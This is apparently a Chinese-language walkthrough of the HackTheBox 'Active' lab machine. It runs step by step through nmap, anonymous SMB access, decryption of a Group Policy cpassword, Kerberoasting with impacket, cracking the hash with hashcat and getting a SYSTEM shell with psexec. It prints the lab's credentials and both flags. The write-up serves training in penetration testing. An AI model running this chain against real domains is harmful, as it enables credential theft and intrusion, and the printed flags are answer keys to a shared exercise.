Hackthebox - Active

靶场信息

靶场类型

信息收集

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-22 02:56 EDT
Nmap scan report for 10.10.10.100
Host is up (0.32s latency).
Not shown: 65513 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-22 06:57:01Z)
135/tcp   open  msrpc?
139/tcp   open  netbios-ssn?
389/tcp   open  tcpwrapped
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msdfsr?
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  unknown
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  unknown
49155/tcp open  tcpwrapped
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  tcpwrapped
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  unknown
49171/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.91%I=7%D=4/22%Time=626251C0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/22%OT=53%CT=1%CU=38032%PV=Y%DS=2%DC=T%G=Y%TM=6262527
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=I%CI=I%TS=7)SEQ(SP=1
OS:05%GCD=1%ISR=10D%TI=I%CI=RD%II=I%SS=O%TS=7)SEQ(SP=105%GCD=1%ISR=10E%TI=R
OS:D%CI=I%II=I%TS=A)OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M5
OS:05NW8ST11%O5=M505NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000
OS:%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF
OS:=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%
OS:Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A
OS:%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y
OS:%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR
OS:%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows                                                                                                     

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-22T06:58:32
|_  start_date: 2022-04-22T06:55:19

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   316.49 ms 10.10.14.1
2   316.60 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.91 seconds

Smb

这里看到有 smb,去查看一下

┌──(root💀kali)-[~/Desktop]
└─# smbmap -H 10.10.10.100                  
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                  
        Disk                                           Permissions     Comment
        ----                                           -----------     -------
        ADMIN$                                         NO ACCESS       Remote Admin
        C$                                             NO ACCESS       Default shar
        IPC$                                           NO ACCESS       Remote IPC
        NETLOGON                                       NO ACCESS       Logon server
        Replication                                    READ ONLY
        SYSVOL                                         NO ACCESS       Logon server
        Users                                          NO ACCESS

这里有一个 Replication 目录是可以查看的,去看一下

┌──(root💀kali)-[~/Desktop]
└─# smbclient //10.10.10.100/Replication    
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 249292 blocks available

有个 active.htb 文件夹,给下载下来

recurse ON
prompt OFF
mget *
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

在上面这个文件中找到了一个账号和密码

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
username = active.htb\SVC_TGS
cpassword = edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVm

漏洞利用

使用 kali 自带的 gpp-decrypt 进行解密

┌──(root💀kali)-[~/Desktop]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
username = SVC_TGS
password = GPPstillStandingStrong2k18

现在我们有了账号密码,继续去 smb 里查看文件

smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 279115 blocks available

似乎直接就进系统了,去找找看有没有有价值的文件

cd SVC_TGS\Desktop\
get user.txt
┌──(root💀kali)-[~/Desktop]
└─# cat user.txt   
a8644850ef3290ae34457a8ad9982d5e

成功拿到 user 权限的 flag 文件

权限提升

这台机器的 88 端口运行着 k8s(kerberos),咱们可以用 impacket 来进行利用

https://github.com/SecureAuthCorp/impacket

接着把这台靶机加入到 hosts里

echo 10.10.10.100 active.htb >> /etc/hosts

然后使用这个工具

python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-04-22 02:56:29.468554             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$65399e5d81a676e87013d1d2c95a9919$831e286d069ed4766f092217ea7ed3e87d62dd0d864b137ef449c0fe02bd6d418c6ea56c01254956638d0b0e6f9868bab37574dc0bdc29f47106d8d4f96d9f87ceb62920f566339adfc5ec5d2761a97a7843be5b750a38b8f0aa42f67b3c1dd909fa1832796d43b2be9830c78450c46802a3c266a0000d0c898b003edbe894fc11e4746382b5a422e04fa23096c50d3330fa9bcae382771bcc528c090c245327d968f1bb06f345dc2d44cf92624eea731e7467f5a6dfb6c90d016bc716de3ba2128a428e7d0b4529dcad6a4d59b1780f7ef863580a1e56348eb12cb865e21c5ce047d289762b0c2ae694db3ffed75416c9cda974a3e4ca591cf25288a0278d4ff4e971013e74c5dcb2321e6b228de3617ed8f53705443dfa858d732f39df31d153ea5dfed178961933883613c692856a381c68f00a7821f77682b9d303a0c7e9af9f24cb6de1ccb5a1d74b7de0d3952669f4ea1d730a5cfabe52a970a6d38013934bea4cc175c2cdcb0da52087fb5599a769e8f50c90535c46e28a081791eb56377d67eb9b8334e89c15c25268ad9af9cea1b4d44cbd3eb5c5d431bab1aabe922fa75af954ec75b024351dd1d22a2df3d2d9f968d191fd456062f22e11c6af3d64ca9ee0bae77f933e5e1879f9f45b50e88a6de5278fffcdc20a99fde8e6e305b3bb213584d5c047df73f432386500dde52cfc1fc277399979a8b5955008aad50cbcfa359ddd6d634b99064663a49a2f477b4d2d8d21ffd8fdf9ccc43b10db9b58964e198444881f96ce700c9dc6cb6c4192274cd7e52c7340f2c052909a9bc78e6dee1b7758f07ac32154d3f4fd01fa776520c514de5e6c3ba53ea0b2c81d9e8c1d0124b3467610038423bd14dbdbc863ddc9d0dfd8d768a3682ee7da66d38c3e7d31937c1eb5813d4997377649be0b14487de5cf23be190c7f20cec1f47afa101829fbf3e12320481ca79f6254e2462dadae248020ed5b0bfff84367f33f101f734ff5727eaa101a4faaeadf267d20b3211583d7794c0892a62b6dc25caafc96c17f21ef1585aa6b95b89aa831a22959e145b490364aa28c42ea79763a1db3ef5159558e6898faaf40e5757e3d7889308ec79ae1d2d721ea98b2e79914d85380c4385d62ee308caa77982c84eaaccc84b19cc69d16b4ae471b270b66c02b16f450c109e58cd5e524d20b092c62ce573115d204825121da3913418a596157b6274c3ac653d352f10983b08046de6e3ab6715169dbf250bf0212

把这段 hash 保存下来,然后使用 hashcat 进行爆破

hashcat hash /usr/share/wordlists/rockyou.txt -m 13100

Ticketmaster1968
┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100                                                                                                                                               1 ⚙
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CahMAAGa.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service jzgq on 10.10.10.100.....
[*] Starting service jzgq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

成功拿到 root 权限的 shell

c:\Users\Administrator\Desktop> type root.txt
d7a6880e1ed8648dcb9012f911819322

成功拿到 root 权限的 flag 文件